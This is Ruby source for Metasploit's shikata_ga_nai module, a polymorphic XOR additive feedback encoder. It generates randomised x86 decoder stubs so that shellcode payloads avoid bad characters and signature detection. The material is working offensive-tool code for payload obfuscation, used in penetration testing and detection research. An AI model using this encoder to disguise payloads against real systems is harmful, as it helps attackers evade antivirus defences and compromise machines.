metasploit-framework/modules/encoders/x86/shikata_ga_nai.rb

315 lines
11 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/poly'
class MetasploitModule < Msf::Encoder::XorAdditiveFeedback
# The shikata encoder has an excellent ranking because it is polymorphic.
# Party time, excellent!
Rank = ExcellentRanking
# Passes this encoder's metadata (name, description, author, architecture,
# license and the decoder's key/block sizes) to the parent class constructor.
def initialize
  # Same text as a multi-line literal: a leading newline, four lines of
  # description and a trailing newline.
  description = [
    '',
    'This encoder implements a polymorphic XOR additive feedback encoder.',
    'The decoder stub is generated based on dynamic instruction',
    'substitution and dynamic block ordering. Registers are also',
    'selected dynamically.',
    ''
  ].join("\n")

  # Both the XOR key and the unit of encoding are four bytes wide.
  decoder_options = { 'KeySize' => 4, 'BlockSize' => 4 }

  super(
    'Name' => 'Polymorphic XOR Additive Feedback Encoder',
    'Description' => description,
    'Author' => 'spoonm',
    'Arch' => ARCH_X86,
    'License' => MSF_LICENSE,
    'Decoder' => decoder_options
  )
end
#
# Generates the shikata decoder stub.
#
# The stub is built at most once per encoder state and cached on the state,
# because this method may be called more than once and has to hand back the
# same stub every time for a given state.
#
# Side effects on the first call: +state.decoder_key_offset+,
# +state.buf+ and +state.decoder_stub+ are all assigned.
#
# @param state encoder state; must respond to +buf+, +decoder_stub+ and
#   +decoder_key_offset+ (readers and writers)
# @return the cached decoder stub
# @raise [BadGenerateError] if a saved register is also one this encoder
#   always modifies, or if no block could be generated
def decoder_stub(state)
  return state.decoder_stub unless state.decoder_stub.nil?

  # Sanity check: a register cannot be both preserved and clobbered.
  clobbered_but_saved = modified_registers & saved_registers
  raise BadGenerateError unless clobbered_but_saved.empty?

  # Shikata will only cut off the last 1-4 bytes of its own end, depending on
  # the alignment of the original buffer (4 when it is already aligned).
  tail_size = 4 - (state.buf.length & 3)
  stub = generate_shikata_block(state, state.buf.length + tail_size, tail_size)
  raise BadGenerateError unless stub

  # Remember where the XORK key placeholder ended up inside the stub.
  state.decoder_key_offset = stub.index('XORK')

  # Move the last 1-4 bytes of the stub to the front of the buffer that is
  # about to be encoded, so that the buffer aligns on a 4-byte boundary.
  stub_tail = stub.slice!(stub.length - tail_size, tail_size)
  state.buf = stub_tail + state.buf

  state.decoder_stub = stub
  state.decoder_stub
end
# Indicate that this module can preserve some registers
# @return [Boolean] always +true+
def can_preserve_registers?
true
end
# A list of registers always touched by this encoder
# @return [Array] the ECX, EAX and EDX register constants, in that order
def modified_registers
  x86 = Rex::Arch::X86

  # ESP is assumed and is handled through preserves_stack?

  # The counter register is hardcoded
  counter = x86::ECX
  # These are modified by div and mul operations
  arithmetic = [x86::EAX, x86::EDX]

  [counter, *arithmetic]
end
# Always blacklist these registers in our block generation
# ESP and ECX come first, followed by any saved registers not already listed.
#
# @return [Array] register constants without duplicates
def block_generator_register_blacklist
  always_reserved = [Rex::Arch::X86::ESP, Rex::Arch::X86::ECX]
  always_reserved | saved_registers
end
protected
#
# Returns the set of FPU instructions that can be used for the FPU block of
# the decoder stub.
#
# Every opcode is assembled with Array#pack, so each entry is a two-byte
# ASCII-8BIT string no matter which encoding this file is parsed with.
# Concatenating a "\xd9"-style literal with Integer#chr only works when the
# literal itself is binary.
#
# @return [Array<String>] two-byte FPU opcodes, ranges first, then singles
def fpu_instructions
  # [first opcode byte, range of second opcode bytes], in emission order
  opcode_ranges = [
    [0xd9, 0xe8..0xee],
    [0xd9, 0xc0..0xcf],
    [0xda, 0xc0..0xdf],
    [0xdb, 0xc0..0xdf],
    [0xdd, 0xc0..0xc7]
  ]
  fpus = opcode_ranges.flat_map do |first, seconds|
    seconds.map { |second| [first, second].pack('CC') }
  end

  # Individual 0xd9-prefixed instructions outside the ranges above
  [0xd0, 0xe1, 0xf6, 0xf7, 0xe5].each do |second|
    fpus << [0xd9, second].pack('CC')
  end

  # This FPU instruction seems to fail consistently on Linux
  # fpus << "\xdb\xe1"
  fpus
end
#
# Returns a polymorphic decoder stub that is capable of decoding a buffer
# of the supplied length and encodes the last cutoff bytes of itself.
#
# The stub is described as a set of Rex::Poly logical blocks (get-PC, clear
# counter, init counter, init key, loop body, loop instruction) linked by
# dependencies, and is produced by generating the final +loop_inst+ block.
#
# @param state encoder state; +context_encoding+ and +badchars+ are read
# @param length [Integer] number of bytes the decoder loop has to cover
# @param cutoff [Integer] number of trailing stub bytes that are encoded
#   together with the payload; subtracted from the loop's displacement
# @return the result of generating the +loop_inst+ block
# @raise [EncodingError] if BufferOffset is outside -255..255 while NULL is a
#   bad character, or if the block generator fails
def generate_shikata_block(state, length, cutoff)
  # Declare logical registers. count_reg is not referenced again below; the
  # counter is hardcoded as ECX/CX/CL in the instruction bytes.
  count_reg = Rex::Poly::LogicalRegister::X86.new('count', 'ecx')
  addr_reg = Rex::Poly::LogicalRegister::X86.new('addr')
  # With context encoding the key register is requested as EAX.
  key_reg =
    if state.context_encoding
      Rex::Poly::LogicalRegister::X86.new('key', 'eax')
    else
      Rex::Poly::LogicalRegister::X86.new('key')
    end

  # Declare individual blocks
  endb = Rex::Poly::SymbolicBlock::End.new

  # Clear the counter register
  clear_register = Rex::Poly::LogicalBlock.new('clear_register',
    "\x31\xc9", # xor ecx,ecx
    "\x29\xc9", # sub ecx,ecx
    "\x33\xc9", # xor ecx,ecx
    "\x2b\xc9") # sub ecx,ecx

  # Initialize the counter after zeroing it. The counter is the number of
  # 4-byte blocks, i.e. the byte length divided by four, rounded up.
  init_counter = Rex::Poly::LogicalBlock.new('init_counter')
  length = (length + 3) / 4
  if length <= 0xff
    init_counter.add_perm([0xb1, length].pack('CC'))        # mov cl, imm8
  elsif length <= 0xffff
    # 0xffff is the largest count a 16-bit immediate can hold; 65536 would be
    # packed as 0x0000 and leave the counter at zero.
    init_counter.add_perm([0x66, 0xb9, length].pack('CCv')) # mov cx, imm16
  else
    init_counter.add_perm([0xb9, length].pack('CV'))        # mov ecx, imm32
  end

  # Key initialization block. With context encoding we use a
  # mov reg, [addr] (0xa1); otherwise a direct mov reg, val (0xb8 + reg).
  # 'XORK' is a placeholder whose position the caller looks up afterwards.
  key_load_opcode = state.context_encoding ? 0xa1 : 0xb8
  init_key = Rex::Poly::LogicalBlock.new('init_key',
    Proc.new { |b| (key_load_opcode + b.regnum_of(key_reg)).chr + 'XORK' })

  # xor [addr_reg + disp8], key_reg / add key_reg, [addr_reg + disp8]
  # (opcode and ModRM only; the displacement byte is appended further down)
  xor = Proc.new { |b| [0x31, 0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))].pack('CC') }
  add = Proc.new { |b| [0x03, 0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))].pack('CC') }
  # Two ways of advancing addr_reg by four: sub -4 and add 4
  sub4 = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -4) }
  add4 = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), 4) }

  if datastore["BufferRegister"]
    buff_reg = Rex::Poly::LogicalRegister::X86.new('buff', datastore["BufferRegister"])
    offset = (datastore["BufferOffset"] ? datastore["BufferOffset"].to_i : 0)
    if (offset < -255 || offset > 255) && state.badchars.include?("\x00")
      raise EncodingError.new("Can't generate NULL-free decoder with a BufferOffset bigger than one byte")
    end

    mov = Proc.new { |b|
      # mov addr_reg, buff_reg (opcode 0x89: destination in r/m, source in reg)
      [0x89, 0xc0 + b.regnum_of(addr_reg) + (8 * b.regnum_of(buff_reg))].pack('CC')
    }
    add_offset = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), offset) }
    sub_offset = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -offset) }

    getpc = Rex::Poly::LogicalBlock.new('getpc')
    getpc.add_perm(Proc.new { |b| mov.call(b) + add_offset.call(b) })
    getpc.add_perm(Proc.new { |b| mov.call(b) + sub_offset.call(b) })
    # With an offset of less than four, inc is smaller than or the same size as add
    if offset > 0 && offset < 4
      getpc.add_perm(Proc.new { |b| mov.call(b) + inc(b.regnum_of(addr_reg)) * offset })
    elsif offset < 0 && offset > -4
      getpc.add_perm(Proc.new { |b| mov.call(b) + dec(b.regnum_of(addr_reg)) * (-offset) })
    end

    # NOTE: Adding a perm with possibly different sizes is normally
    # wrong since it will change the SymbolicBlock::End offset during
    # various stages of generation. In this case, though, offset is
    # constant throughout the whole process, so it isn't a problem.
    #
    # NOTE(review): r/m values 4 (ESP) and, without displacement, 5 (EBP)
    # select SIB / disp32-only addressing on x86; this perm does not
    # special-case them. Confirm those BufferRegister values are handled.
    getpc.add_perm(Proc.new { |b|
      base = b.regnum_of(buff_reg)
      dest = 8 * b.regnum_of(addr_reg)
      if offset == 0
        # lea addr_reg, [buff_reg]
        [0x8d, base + dest].pack('CC')
      elsif offset.between?(-128, 127)
        # lea addr_reg, [buff_reg + byte offset]; disp8 is sign-extended, so
        # only -128..127 can be represented in one byte
        [0x8d, 0x40 + base + dest, offset].pack('CCc')
      else
        # lea addr_reg, [buff_reg + DWORD offset]
        # NOTE: This can generate NULL bytes!
        [0x8d, 0x80 + base + dest, offset].pack('CCV')
      end
    })

    # BufferReg+BufferOffset points right at the beginning of our
    # buffer, so in contrast to the fnstenv technique, we don't have to
    # sub off any other offsets.
    end_distance = Proc.new { |b| b.offset_of(endb) }
  else
    # FPU blocks
    fpu = Rex::Poly::LogicalBlock.new('fpu', *fpu_instructions)
    fnstenv = Rex::Poly::LogicalBlock.new('fnstenv', "\xd9\x74\x24\xf4")
    fnstenv.depends_on(fpu)

    # Get EIP off the stack
    getpc = Rex::Poly::LogicalBlock.new('getpc',
      Proc.new { |b| (0x58 + b.regnum_of(addr_reg)).chr })
    getpc.depends_on(fnstenv)

    # Subtract the offset of the fpu instruction since that's where eip points after fnstenv
    end_distance = Proc.new { |b| b.offset_of(endb) - b.offset_of(fpu) }
  end

  # xor1/add1 are used while addr_reg has not been advanced yet; xor2/add2
  # are used after it has been advanced by four, hence the extra -4.
  xor1 = Proc.new { |b| xor.call(b) + [end_distance.call(b) - cutoff].pack('c') }
  xor2 = Proc.new { |b| xor.call(b) + [end_distance.call(b) - 4 - cutoff].pack('c') }
  add1 = Proc.new { |b| add.call(b) + [end_distance.call(b) - cutoff].pack('c') }
  add2 = Proc.new { |b| add.call(b) + [end_distance.call(b) - 4 - cutoff].pack('c') }

  # Decoder loop block
  loop_block = Rex::Poly::LogicalBlock.new('loop_block')
  loop_block.add_perm(
    Proc.new { |b| xor1.call(b) + add1.call(b) + sub4.call(b) },
    Proc.new { |b| xor1.call(b) + sub4.call(b) + add2.call(b) },
    Proc.new { |b| sub4.call(b) + xor2.call(b) + add2.call(b) },
    Proc.new { |b| xor1.call(b) + add1.call(b) + add4.call(b) },
    Proc.new { |b| xor1.call(b) + add4.call(b) + add2.call(b) },
    Proc.new { |b| add4.call(b) + xor2.call(b) + add2.call(b) })

  # Loop instruction block
  loop_inst = Rex::Poly::LogicalBlock.new('loop_inst', "\xe2\xf5")
  # In the current implementation the loop block is a constant size,
  # so really no need for a fancy calculation. Nevertheless, here's
  # one way to do it:
  #Proc.new { |b|
  #  # loop <loop_block label>
  #  # -2 to account for the size of this instruction
  #  "\xe2" + [ -2 - b.size_of(loop_block) ].pack('c')
  #})

  # Define block dependencies
  clear_register.depends_on(getpc)
  init_counter.depends_on(clear_register)
  loop_block.depends_on(init_counter, init_key)
  loop_inst.depends_on(loop_block)

  begin
    # Generate a permutation saving the ECX, ESP, and user defined registers
    loop_inst.generate(block_generator_register_blacklist, nil, state.badchars)
  rescue RuntimeError, EncodingError => e
    # The Rex::Poly block generator can raise RuntimeError variants
    raise EncodingError, e.to_s
  end
end
# Convert the SaveRegisters to an array of x86 register constants
# @return whatever Rex::Arch::X86.register_names_to_ids yields for the
#   'SaveRegisters' datastore option
def saved_registers
  register_names = datastore['SaveRegisters']
  Rex::Arch::X86.register_names_to_ids(register_names)
end
# Encodes +sub reg, imm+ for a 32-bit register.
#
# The short form (opcode 0x83) carries a single immediate byte that the CPU
# sign-extends, so it is only used for -128..127. Everything else uses the
# long form (opcode 0x81) with a 32-bit little-endian immediate.
#
# @param regnum [Integer] register number, added to the 0xe8 ModRM base
# @param imm [Integer, nil] value to subtract
# @return [String] the instruction bytes, or "" when +imm+ is nil or zero
def sub_immediate(regnum, imm)
  return "" if imm.nil? || imm == 0

  modrm = 0xe8 + regnum
  if imm.between?(-128, 127)
    [0x83, modrm, imm].pack('CCc')
  else
    [0x81, modrm, imm].pack('CCV')
  end
end
# Encodes +add reg, imm+ for a 32-bit register.
#
# The short form (opcode 0x83) carries a single immediate byte that the CPU
# sign-extends, so it is only used for -128..127. Everything else uses the
# long form (opcode 0x81) with a 32-bit little-endian immediate.
#
# @param regnum [Integer] register number, added to the 0xc0 ModRM base
# @param imm [Integer, nil] value to add
# @return [String] the instruction bytes, or "" when +imm+ is nil or zero
def add_immediate(regnum, imm)
  return "" if imm.nil? || imm == 0

  modrm = 0xc0 + regnum
  if imm.between?(-128, 127)
    [0x83, modrm, imm].pack('CCc')
  else
    [0x81, modrm, imm].pack('CCV')
  end
end
# Builds the one-byte instruction whose opcode is 0x40 plus the register
# number (the short +inc r32+ form on 32-bit x86).
#
# @param regnum [Integer] register number
# @return [String] a single-byte string
def inc(regnum)
  opcode = 0x40 + regnum
  [opcode].pack('C')
end
# Builds the one-byte instruction whose opcode is 0x48 plus the register
# number (the short +dec r32+ form on 32-bit x86).
#
# @param regnum [Integer] register number
# @return [String] a single-byte string
def dec(regnum)
  opcode = 0x48 + regnum
  [opcode].pack('C')
end
end